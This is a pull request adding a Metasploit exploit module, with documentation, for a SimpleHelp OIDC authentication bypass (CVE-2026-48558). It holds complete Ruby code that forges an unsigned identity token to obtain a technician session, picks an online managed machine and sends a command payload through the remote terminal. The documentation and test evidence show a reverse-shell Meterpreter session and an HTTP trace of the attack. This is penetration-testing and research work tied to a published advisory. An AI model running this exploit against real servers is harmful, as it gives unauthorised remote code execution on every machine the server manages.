### PR TITLE
SimpleHelp OpenID Connect Auth Bypass to RCE [CVE-2026-48558]

### DIFF
--- a/documentation/modules/exploit/multi/http/simplehelp_oidc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/multi/http/simplehelp_oidc_auth_bypass_rce.md
@@ -1,0 +1,117 @@
+## Vulnerable Application
+
+This module exploits CVE-2026-48558, an authentication bypass in SimpleHelp. SimpleHelp accepts an OIDC identity token without
+verifying its signature. The module forges a technician identity, connects to an online managed machine using SimpleHelp's remote
+access protocol, and runs a command through its remote terminal. A command payload can therefore return a session from the managed
+machine.
+
+SimpleHelp 5.5.0 through 5.5.15 are affected, as are some SimpleHelp 6.0 prerelease builds before 6.0 RC2. SimpleHelp 5.5.16 and
+6.0 RC2 or later contain the fix.
+
+Exploitation requires all of the following:
+
+* An OIDC provider associated with a technician group that allows group-authenticated logins.
+* Permission for that technician group to view the selected machine and run remote commands.
+* A valid SimpleHelp session license.
+* At least one visible and online managed machine.
+
+### Setup
+
+The vendor no longer publishes the affected installers at their former release URLs. The following commands use a third-party
+Docker image containing SimpleHelp 5.5.14 and should only be used in an isolated test environment.
+
+On an Ubuntu test system with Docker installed, run:
+
+```bash
+sudo docker volume create simplehelp-cve-2026-48558
+sudo docker run -d \
+  --name simplehelp-cve-2026-48558 \
+  --restart unless-stopped \
+  -p 8443:80 \
+  -p 8444:443 \
+  -v simplehelp-cve-2026-48558:/opt/SimpleHelp/configuration \
+  alzahar/simplehelpserver:5.5.14
+```
+
+Browse to `http://127.0.0.1:8443`, select **Start New Server**, and finish the initial configuration. Install a valid trial or
+commercial license using the SimpleHelp administration client. Then:
+
+1. Add and enable an OpenID Connect authentication service.
+2. Associate that authentication service with a technician group.
+3. Enable **Allow group authenticated logins** for the technician group.
+4. Permit the group to access machines and use remote terminal commands.
+
+The identity provider does not need to remain reachable because SimpleHelp processes the forged identity token at its own callback
+endpoint.
+
+Open `https://127.0.0.1:8444/access` and download the generated Remote Access installer for the managed machine. On a Linux test
+machine, extract the offline archive and install it with:
+
+```bash
+sudo './Remote Access-linux64-offline' /ForceVerification /S
+```
+
+Confirm that the machine is online and visible in the SimpleHelp technician client before running the module.
+
+## Verification Steps
+
+1. Start `msfconsole`.
+2. Run `use exploit/multi/http/simplehelp_oidc_auth_bypass_rce`.
+3. Run `set RHOSTS <SimpleHelp server>`.
+4. Run `set RPORT 8444` if using the Docker configuration above.
+5. Select the target matching the managed machine operating system.
+6. Configure an `ARCH_CMD` payload and its required options.
+7. Run `run`.
+8. Confirm that the payload returns a session from the managed machine.
+
+## Options
+
+### OIDC_PROVIDER
+
+The name of the configured OIDC provider to use. If unset, the module uses the first OIDC or Azure provider exposed by SimpleHelp.
+
+### MACHINE_ID
+
+The managed machine identifier to connect to. If unset, the module selects the first visible online machine.
+
+### NEW_USERNAME
+
+The username placed in the forged identity token.
+
+### NEW_EMAIL
+
+The email address placed in the forged identity token.
+
+### NEW_DISPLAY_NAME
+
+The display name placed in the forged identity token.
+
+
+## Scenarios
+
+### SimpleHelp 5.5.14 with a managed Ubuntu 24.04 machine
+
+```text
+msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set RHOSTS 172.16.199.131
+RHOSTS => 172.16.199.131
+msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set RPORT 8444
+RPORT => 8444
+msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set LHOST 172.16.199.1
+LHOST => 172.16.199.1
+msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set FETCH_SRVHOST 172.16.199.1
+FETCH_SRVHOST => 172.16.199.1
+msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. SimpleHelp 5.5.14 exposes OIDC provider(s): Metasploit OIDC Lab
+[*] Requesting an authorization flow for OIDC provider "Metasploit OIDC Lab"
+[*] Submitting a forged identity token for "example-technician"
+[+] Authenticated as SimpleHelp technician example-technician
+[*] Found 1 managed machine
+[*] Connecting to managed machine "ubuntu-managed-host" (<machine id>)
+[*] Executing the payload through the Unix/Linux/macOS Command terminal
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:49152)
+```

--- a/documentation/modules/exploit/multi/http/simplehelp_oidc_auth_bypass_rce.md
+++ b/documentation/modules/exploit/multi/http/simplehelp_oidc_auth_bypass_rce.md
@@ -91,7 +91,7 @@ The display name placed in the forged identity token.
 
 ### SimpleHelp 5.5.14 with a managed Ubuntu 24.04 machine
 
-```text
+```
 msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set RHOSTS 172.16.199.131
 RHOSTS => 172.16.199.131
 msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set RPORT 8444
@@ -108,10 +108,19 @@ msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > run
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. SimpleHelp 5.5.14 exposes OIDC provider(s): Metasploit OIDC Lab
 [*] Requesting an authorization flow for OIDC provider "Metasploit OIDC Lab"
-[*] Submitting a forged identity token for "example-technician"
-[+] Authenticated as SimpleHelp technician example-technician
+[*] Submitting a forged identity token for "dion.jast"
+[+] Authenticated as SimpleHelp technician dion.jast
 [*] Found 1 managed machine
-[*] Connecting to managed machine "ubuntu-managed-host" (<machine id>)
+[*] Connecting to managed machine "msfuser-VMware-Virtual-Platform" (SG_694475357954214171)
 [*] Executing the payload through the Unix/Linux/macOS Command terminal
-[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:49152)
+[*] Sending stage (3106788 bytes) to 172.16.199.131
+[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:59312) at 2026-09-01 13:59:04 -0700
+
+meterpreter > sysinfo
+Computer     : msfuser-VMware-Virtual-Platform
+OS           : Ubuntu 24.04 (Linux 7.0.0-28-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
 ```

--- a/modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
@@ -421,15 +421,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def receive_websocket_message(timeout)
-    frame = ::Timeout.timeout(timeout) { @wsock.get_wsframe }
-    fail_with(Failure::Disconnected, 'The SimpleHelp WebSocket connection closed unexpectedly') unless frame
+    frame = ::Timeout.timeout(timeout) do
+      loop do
+        frame = @wsock.get_wsframe
+        fail_with(Failure::Disconnected, 'The SimpleHelp WebSocket connection closed unexpectedly') unless frame
 
-    if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::PING
-      @wsock.put_wsframe(frame.dup.tap { |reply| reply.header.opcode = Rex::Proto::Http::WebSocket::Opcode::PONG })
-      return receive_websocket_message(timeout)
+        if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::PING
+          @wsock.put_wsframe(frame.dup.tap { |reply| reply.header.opcode = Rex::Proto::Http::WebSocket::Opcode::PONG })
+          next
+        end
+        fail_with(Failure::Disconnected, 'The SimpleHelp WebSocket connection closed unexpectedly') if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
+        next unless frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::TEXT
+
+        break frame
+      end
     end
-    fail_with(Failure::Disconnected, 'The SimpleHelp WebSocket connection closed unexpectedly') if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
-    return receive_websocket_message(timeout) unless frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::TEXT
 
     JSON.parse(frame.payload_data.to_s)
   rescue ::Timeout::Error

--- a/modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
+++ b/modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
@@ -1,0 +1,466 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  TECH_SERVER_PLANE = 0
+  USER_CONNECT_PLANE = 2
+  SOCKET_SETUP_PLANE = 0
+  TERMINAL_PLANE = 5
+
+  TRANSACTION_WRAPPER = -1_524_849_380
+  GET_MACHINE_LIST = 13_000
+  CONNECT_TO_MACHINE = 8_000
+
+  TOTP_TOKEN_REQUEST = 170
+  SOCKET_FIRST = -4_517_462
+  SOCKET_PASSWORD_OK = -1_412_623_820
+  SOCKET_BAD_PASSWORD = 1_126_292_666
+  TERMINAL_COMMAND = 655_362
+  TERMINAL_OUTPUT = 655_363
+  TERMINAL_NEW = 655_369
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SimpleHelp OIDC Authentication Bypass Remote Code Execution',
+        'Description' => %q{
+          This module exploits CVE-2026-48558 to forge an OpenID Connect identity token and
+          obtain a SimpleHelp technician session. It then uses SimpleHelp's legitimate remote
+          access WebSocket protocol to connect to an online managed machine and execute a
+          payload through the remote terminal.
+
+          An OIDC provider must be enabled for a technician group that permits group-authenticated
+          logins. The group must be allowed to access the selected machine and run remote commands.
+          The SimpleHelp server must have a valid session license, and at least one managed machine
+          must be online.
+
+          SimpleHelp 5.5.0 through 5.5.15 are affected. Some SimpleHelp 6.0 prerelease builds before
+          6.0 RC2 are also affected.
+        },
+        'Author' => [
+          'Zach Hanley', # Discovery
+          'Horizon3.ai', # Vulnerability research
+          'Blackpoint Cyber', # Post-authentication intrusion chain
+          'jheysel-r7' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2026-48558'],
+          ['URL', 'https://horizon3.ai/attack-research/disclosures/cve-2026-48558-simplehelp-authentication-bypass-iocs/'],
+          ['URL', 'https://guides.simple-help.com/kb---security-vulnerabilities-05-2026'],
+          ['URL', 'https://blackpointcyber.com/blog/a-djinn-in-the-machine-taskweavers-node-js-intrusion-chain/']
+        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2026-06-12',
+        'Privileged' => true,
+        'Payload' => {
+          'BadChars' => "\x00\r\n"
+        },
+        'Targets' => [
+          [
+            'Unix/Linux/macOS Command',
+            {
+              'Platform' => %w[linux osx unix],
+              'Arch' => ARCH_CMD,
+              'Shell' => 3,
+              'OSPattern' => /Linux|Ubuntu|Debian|Fedora|Red Hat|CentOS|macOS|Mac OS/i
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Shell' => 1,
+              'OSPattern' => /Windows/i
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the SimpleHelp installation', '/']),
+        OptString.new('OIDC_PROVIDER', [false, 'The OIDC provider name (the first available provider is used by default)']),
+        OptString.new('MACHINE_ID', [false, 'The managed machine ID to obtain a session on (the first online machine is used by default)']),
+        OptString.new('NEW_USERNAME', [true, 'The username claim for the forged technician', Faker::Internet.username(specifier: 8..12)]),
+        OptString.new('NEW_EMAIL', [true, 'The email claim for the forged technician', Faker::Internet.email]),
+        OptString.new('NEW_DISPLAY_NAME', [true, 'The display name claim for the forged technician', Faker::Name.name])
+      ]
+    )
+  end
+
+  def check
+    version_res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'allversions')
+    )
+    return CheckCode::Unknown('No response received from the target') unless version_res
+    return CheckCode::Unknown('Unable to retrieve the SimpleHelp version') unless version_res.body =~ /^Visual Version:\s*(\d+\.\d+(?:\.\d+)?)/
+
+    version = Rex::Version.new(Regexp.last_match(1))
+    unless version.between?(Rex::Version.new('5.5.0'), Rex::Version.new('5.5.15'))
+      if version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')
+        return CheckCode::Detected("SimpleHelp #{version} detected; the version string does not identify affected 6.0 prerelease builds")
+      end
+
+      return CheckCode::Safe("SimpleHelp version #{version} is not affected")
+    end
+
+    providers = oidc_providers
+    return CheckCode::Safe("SimpleHelp #{version} does not expose an enabled OIDC provider") if providers.empty?
+
+    provider_names = providers.filter_map { |provider| provider['name'] }.join(', ')
+    CheckCode::Appears("SimpleHelp #{version} exposes OIDC provider(s): #{provider_names}")
+  rescue StandardError => e
+    CheckCode::Unknown("Failed to check the target: #{e.message}")
+  end
+
+  def exploit
+    cookie_jar.clear
+    session_cookie = create_technician_session
+    @wsock = connect_ws(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'headers' => {
+        'Cookie' => "#{session_cookie.name}=#{session_cookie.value}"
+      }
+    )
+
+    technician = authenticate_websocket(session_cookie.value)
+    report_service(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: ssl ? 'https' : 'http',
+      info: 'SimpleHelp remote support server'
+    )
+    machine = select_machine(enumerate_machines)
+    validate_machine_target!(machine)
+
+    print_status("Connecting to managed machine #{machine['name'].inspect} (#{machine['machineID']})")
+    establish_remote_terminal(machine['machineID'], technician)
+
+    print_status("Executing the payload through the #{target.name} terminal")
+    send_user_plane(TERMINAL_PLANE, {
+      'type' => TERMINAL_COMMAND,
+      'terminalNumber' => 0,
+      'dataString' => "#{payload.encoded}\n"
+    })
+
+    report_vuln(
+      host: rhost,
+      port: rport,
+      proto: 'tcp',
+      name: name,
+      info: "Executed a command on managed machine #{machine['machineID']} through a forged technician session",
+      refs: references
+    )
+  rescue Rex::Proto::Http::WebSocket::ConnectionError => e
+    fail_with(Failure::Unreachable, "The SimpleHelp WebSocket connection failed: #{e.message}")
+  end
+
+  def cleanup
+    @wsock&.wsclose
+  rescue StandardError
+    nil
+  ensure
+    super
+  end
+
+  def create_technician_session
+    provider = select_provider
+    print_status("Requesting an authorization flow for OIDC provider #{provider['name'].inspect}")
+
+    callback = "#{normalize_uri(target_uri.path, 'webapps', 'technician')}/"
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'auth', 'v1', 'account', 'oidc_get'),
+      'vars_get' => {
+        'payload' => provider.merge('callback' => callback).to_json
+      },
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, 'No response received while starting the OIDC flow') unless res
+    fail_with(Failure::UnexpectedReply, "OIDC flow request returned HTTP #{res.code}") unless res.code == 200
+
+    authorization_url = res.get_json_document
+    fail_with(Failure::UnexpectedReply, 'The OIDC flow response did not contain an authorization URL') unless authorization_url.is_a?(String)
+
+    begin
+      authorization_query = URI.decode_www_form(URI.parse(authorization_url).query.to_s).to_h
+    rescue URI::InvalidURIError, ArgumentError => e
+      fail_with(Failure::UnexpectedReply, "The OIDC authorization URL could not be parsed: #{e.message}")
+    end
+
+    state = authorization_query['state']
+    fail_with(Failure::UnexpectedReply, 'The OIDC authorization URL did not contain a state parameter') if state.blank?
+
+    claims = {
+      'sub' => Faker::Internet.uuid,
+      'preferred_username' => datastore['NEW_USERNAME'],
+      'name' => datastore['NEW_DISPLAY_NAME'],
+      'email' => datastore['NEW_EMAIL'],
+      'iat' => Time.now.to_i,
+      'exp' => Time.now.to_i + 3600
+    }
+    claims['nonce'] = authorization_query['nonce'] if authorization_query['nonce'].present?
+
+    id_token = [
+      Rex::Text.encode_base64url({ 'alg' => 'none', 'typ' => 'JWT' }.to_json),
+      Rex::Text.encode_base64url(claims.to_json),
+      'x'
+    ].join('.')
+
+    print_status("Submitting a forged identity token for #{datastore['NEW_USERNAME'].inspect}")
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'oidc'),
+      'vars_post' => {
+        'state' => state,
+        'id_token' => id_token
+      },
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, 'No response received from the OIDC callback') unless res
+    fail_with(Failure::UnexpectedReply, "The OIDC callback returned HTTP #{res.code}") unless [200, 302].include?(res.code)
+
+    status_res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'auth', 'v1', 'account', 'status'),
+      'keep_cookies' => true
+    )
+    fail_with(Failure::Unreachable, 'No response received while verifying the technician session') unless status_res
+    fail_with(Failure::UnexpectedReply, "The account status endpoint returned HTTP #{status_res.code}") unless status_res.code == 200
+
+    status = status_res.get_json_document
+    unless status.is_a?(Hash) && status['state'] == 'FULLY_AUTHENTICATED' && status['code'] == 1
+      fail_with(Failure::NoAccess, 'The forged identity token did not create an authenticated technician session')
+    end
+
+    session_cookie = cookie_jar.cookies.find { |cookie| cookie.name == 'shelp-tc-sessionid' }
+    fail_with(Failure::UnexpectedReply, 'Authentication succeeded but the technician session cookie was not found') unless session_cookie
+
+    print_good("Authenticated as SimpleHelp technician #{status.dig('user', 'username') || datastore['NEW_USERNAME']}")
+    session_cookie
+  end
+
+  def authenticate_websocket(session_token)
+    send_websocket_message('credentials' => { 'sessionToken64' => session_token })
+    login_accepted = false
+
+    wait_for_websocket_message('technician WebSocket authentication') do |message|
+      if message['code'] == TOTP_TOKEN_REQUEST
+        send_websocket_message('message' => 'NONE')
+        next false
+      end
+
+      if message['code'] == 1
+        login_accepted = true
+        next false
+      end
+
+      if message['code'] && message['code'] < 0
+        fail_with(Failure::NoAccess, 'The technician session was rejected by the WebSocket endpoint')
+      end
+
+      next false unless login_accepted && message['transientTechUser'].is_a?(Hash)
+
+      message['transientTechUser']
+    end
+  end
+
+  def enumerate_machines
+    send_tech_transaction(0, 'type' => GET_MACHINE_LIST)
+    machines = wait_for_websocket_message('managed machine list') do |message|
+      candidate = message.dig('payload', 'payload', 'machines') if message['plane'] == TECH_SERVER_PLANE
+      candidate.is_a?(Array) ? candidate : false
+    end
+    print_status("Found #{machines.length} managed machine#{machines.length == 1 ? '' : 's'}")
+    machines
+  end
+
+  def select_machine(machines)
+    requested_id = datastore['MACHINE_ID']
+    if requested_id.present?
+      machine = machines.find { |candidate| candidate['machineID'] == requested_id }
+      fail_with(Failure::BadConfig, "Managed machine #{requested_id.inspect} was not found") unless machine
+    else
+      machine = machines.find { |candidate| candidate['online'] }
+      fail_with(Failure::NotFound, 'No online managed machines are visible to the forged technician') unless machine
+    end
+
+    fail_with(Failure::NoTarget, "Managed machine #{machine['machineID']} is offline") unless machine['online']
+    machine
+  end
+
+  def validate_machine_target!(machine)
+    machine_os = machine['os'].to_s
+    return if machine_os.match?(target['OSPattern'])
+
+    fail_with(Failure::BadConfig, "The selected #{target.name} target does not match managed machine OS #{machine_os.inspect}")
+  end
+
+  def establish_remote_terminal(machine_id, technician)
+    send_tech_transaction(1, {
+      'type' => CONNECT_TO_MACHINE,
+      'machineID' => machine_id
+    })
+
+    connection_accepted = false
+    socket_authenticated = false
+    terminal_output = +''
+
+    wait_for_websocket_message('remote terminal prompt', timeout: 45) do |message|
+      if message['plane'] == TECH_SERVER_PLANE && message.dig('payload', 'conv') == 1
+        response = message.dig('payload', 'payload')
+        if response['type'] == -3
+          fail_with(Failure::NoAccess, "SimpleHelp refused the remote session: #{response['note']}")
+        elsif response['type'].to_i < 0
+          fail_with(Failure::UnexpectedReply, "SimpleHelp returned remote connection error #{response['type']}: #{response['note']}")
+        elsif response['type'] == 1
+          connection_accepted = true
+        end
+      end
+
+      next false unless message['plane'] == USER_CONNECT_PLANE
+
+      nested = message['payload']
+      next false unless nested.is_a?(Hash) && nested['plane']
+
+      nested_payload = nested['payload']
+      next false unless nested_payload.is_a?(Hash)
+
+      if nested['plane'] == SOCKET_SETUP_PLANE
+        case nested_payload['type']
+        when SOCKET_FIRST
+          send_user_plane(SOCKET_SETUP_PLANE, 'password' => '')
+        when SOCKET_BAD_PASSWORD
+          fail_with(Failure::NoAccess, 'The managed machine requires a remote access password')
+        when SOCKET_PASSWORD_OK
+          basic_technician = {
+            'uniqueID' => technician['uniqueID'],
+            'displayName' => technician['displayName'],
+            'username' => technician['username'],
+            'emailAddress' => technician['emailAddress'],
+            'isOnline' => true
+          }
+          send_user_plane(SOCKET_SETUP_PLANE, basic_technician)
+          Rex.sleep(0.5)
+          send_user_plane(TERMINAL_PLANE, {
+            'type' => TERMINAL_NEW,
+            'terminalNumber' => 0,
+            'shell' => target['Shell']
+          })
+          socket_authenticated = true
+        end
+      elsif nested['plane'] == TERMINAL_PLANE && nested_payload['type'] == TERMINAL_OUTPUT
+        data = nested_payload['data']
+        terminal_output << data.pack('C*') if data.is_a?(Array)
+      end
+
+      connection_accepted && socket_authenticated && terminal_output.match?(/[>$%]\s*\z|#\s*\z/)
+    end
+  end
+
+  def send_tech_transaction(conversation_id, request)
+    send_websocket_message(
+      'plane' => TECH_SERVER_PLANE,
+      'payload' => {
+        'type' => TRANSACTION_WRAPPER,
+        'conv' => conversation_id,
+        'payload' => request
+      }
+    )
+  end
+
+  def send_user_plane(plane, payload)
+    send_websocket_message(
+      'plane' => USER_CONNECT_PLANE,
+      'payload' => {
+        'plane' => plane,
+        'payload' => payload
+      }
+    )
+  end
+
+  def send_websocket_message(message)
+    @wsock.put_wstext(message.to_json)
+  end
+
+  def wait_for_websocket_message(description, timeout: 20)
+    deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + timeout
+    loop do
+      remaining = deadline - Process.clock_gettime(Process::CLOCK_MONOTONIC)
+      fail_with(Failure::TimeoutExpired, "Timed out waiting for #{description}") if remaining <= 0
+
+      message = receive_websocket_message(remaining)
+      result = yield(message)
+      return result if result
+    end
+  end
+
+  def receive_websocket_message(timeout)
+    frame = ::Timeout.timeout(timeout) { @wsock.get_wsframe }
+    fail_with(Failure::Disconnected, 'The SimpleHelp WebSocket connection closed unexpectedly') unless frame
+
+    if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::PING
+      @wsock.put_wsframe(frame.dup.tap { |reply| reply.header.opcode = Rex::Proto::Http::WebSocket::Opcode::PONG })
+      return receive_websocket_message(timeout)
+    end
+    fail_with(Failure::Disconnected, 'The SimpleHelp WebSocket connection closed unexpectedly') if frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::CONNECTION_CLOSE
+    return receive_websocket_message(timeout) unless frame.header.opcode == Rex::Proto::Http::WebSocket::Opcode::TEXT
+
+    JSON.parse(frame.payload_data.to_s)
+  rescue ::Timeout::Error
+    fail_with(Failure::TimeoutExpired, 'Timed out waiting for a SimpleHelp WebSocket response')
+  rescue JSON::ParserError => e
+    fail_with(Failure::UnexpectedReply, "SimpleHelp returned an invalid WebSocket JSON message: #{e.message}")
+  end
+
+  def oidc_providers
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'auth', 'v1', 'account', 'login_options')
+    )
+    return [] unless res&.code == 200
+
+    options = res.get_json_document
+    return [] unless options.is_a?(Array)
+
+    options.select { |provider| provider.is_a?(Hash) && %w[oidc azure].include?(provider['type']) }
+  end
+
+  def select_provider
+    providers = oidc_providers
+    fail_with(Failure::NotFound, 'No enabled OIDC provider was exposed by SimpleHelp') if providers.empty?
+
+    requested_provider = datastore['OIDC_PROVIDER']
+    return providers.first if requested_provider.blank?
+
+    provider = providers.find { |candidate| candidate['name'] == requested_provider }
+    fail_with(Failure::BadConfig, "OIDC provider #{requested_provider.inspect} was not found") unless provider
+
+    provider
+  end
+end


### PR DESCRIPTION
 ## Description

  Adds an exploit module for CVE-2026-48558, an OIDC authentication bypass affecting SimpleHelp 5.5.0 through 5.5.15.

  The module:

  - Forges an OIDC identity token to obtain a technician session.
  - Enumerates visible managed machines.
  - Connects to an online machine through SimpleHelp’s WebSocket protocol.
  - Executes an ARCH_CMD payload using the remote terminal.
  - Supports Unix/Linux/macOS and Windows managed machines.
  - Implements AutoCheck and optional provider and machine selection.

  Exploitation requires an enabled OIDC provider, a suitable technician group, remote-command permissions, an online managed machine, and an available SimpleHelp session license.

  The module was tested against SimpleHelp 5.5.14 with an Ubuntu 24.04 managed endpoint. A Linux fetch payload successfully returned a root Meterpreter session.

  Documentation includes vulnerable-environment setup, prerequisites, options, targets, and an example scenario.

## Breaking Changes

  None

## Reviewer Notes
In order to setup SimpleHelp and attach a remote managed machine, required to exploit the RCE portion of this module, you need a valid license. So I included a HTTPTrace output of the module running, in the event you didn't want to set this up to test. I figured because SSL is enabled on the vulnerable port, an HTTPTrace would be better than a pcap. 

## Verification Steps

  1. [ ] Deploy SimpleHelp 5.5.14 using alzahar/simplehelpserver:5.5.14.
  2. [ ] Configure an OIDC provider for a technician group with group-authenticated logins, machine access, and remote-command permissions.
  3. [ ] Install a valid SimpleHelp session license and register an online Remote Access machine.
  4. [ ] Start msfconsole.
  5. [ ] Run use exploit/multi/http/simplehelp_oidc_auth_bypass_rce.
  6. [ ] Configure RHOSTS, RPORT, and SSL for the SimpleHelp server.
  7. [ ] Run check. The expected outcome is CheckCode::Appears, identifying SimpleHelp 5.5.14 and the exposed OIDC provider.
  8. [ ] Select the target matching the managed machine’s operating system.
  9. [ ] Configure an appropriate ARCH_CMD payload and its listener/fetch options.
  10. [ ] Run exploit. The expected outcome is successful forged-technician authentication followed by a session from the managed machine.
  11. [ ] Run the following static checks and confirm they report no errors:

  ruby -c modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
  bundle exec rubocop modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
  ruby tools/dev/msftidy.rb modules/exploits/multi/http/simplehelp_oidc_auth_bypass_rce.rb
  ruby tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/http/simplehelp_oidc_auth_bypass_rce.md



## Test Evidence

<details> 
<summary>HTTP trace of module running </summary> 

<p>

```
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > set httptrace true
httptrace => true
msf exploit(multi/http/simplehelp_oidc_auth_bypass_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:8873
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /allversions HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0


####################
# Response:
####################
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 474
Keep-Alive: timeout=0
Connection: Keep-Alive

SH Version:           SSuite-5-5-20251106-112521
Visual Version:       5.5.14
Access Version:       00118607124 (Thu, 06 Nov 2025 11:28:16 GMT)
Customer Version:     00118607123 (Thu, 06 Nov 2025 11:28:12 GMT)
Technician Version:   00118607127 (Thu, 06 Nov 2025 11:28:28 GMT)
Remote Work Version:  00118607127 (Thu, 06 Nov 2025 11:28:28 GMT)
Present Version:      00118607127 (Thu, 06 Nov 2025 11:28:28 GMT)
Group Access Version: 00118607127 (Thu, 06 Nov 2025 11:28:28 GMT)

####################
# Request:
####################
GET /auth/v1/account/login_options HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Content-Length: 46
Keep-Alive: timeout=300
Connection: Keep-Alive

[{"type":"oidc","name":"Metasploit OIDC Lab"}]
[+] The target appears to be vulnerable. SimpleHelp 5.5.14 exposes OIDC provider(s): Metasploit OIDC Lab
####################
# Request:
####################
GET /auth/v1/account/login_options HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json
Content-Length: 46
Keep-Alive: timeout=300
Connection: Keep-Alive

[{"type":"oidc","name":"Metasploit OIDC Lab"}]
[*] Requesting an authorization flow for OIDC provider "Metasploit OIDC Lab"
####################
# Request:
####################
GET /auth/v1/account/oidc_get?payload=%7b%22type%22%3a%22oidc%22%2c%22name%22%3a%22Metasploit%20OIDC%20Lab%22%2c%22callback%22%3a%22/webapps/technician/%22%7d HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: shelp-tc-sessionid=0MGvw0KnwDfhsO47VZV6EDv9oXY1j5KANik4OM6S4P4=; Path=/
Content-Type: application/json
Content-Length: 243
Keep-Alive: timeout=300
Connection: Keep-Alive

"http://127.0.0.1:9000/authorize?response_type\u003dcode\u0026client_id\u003dsimplehelp-lab\u0026redirect_uri\u003dhttps%3A%2F%2F64.125.235.5%2Foidc\u0026scope\u003dopenid%20profile%20email\u0026state\u003d04141af8-92f8-4328-9994-3624ffd135cf"
[*] Submitting a forged identity token for "wilbur.nolan"
####################
# Request:
####################
POST /oidc HTTP/1.1
Host: 172.16.199.131:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0
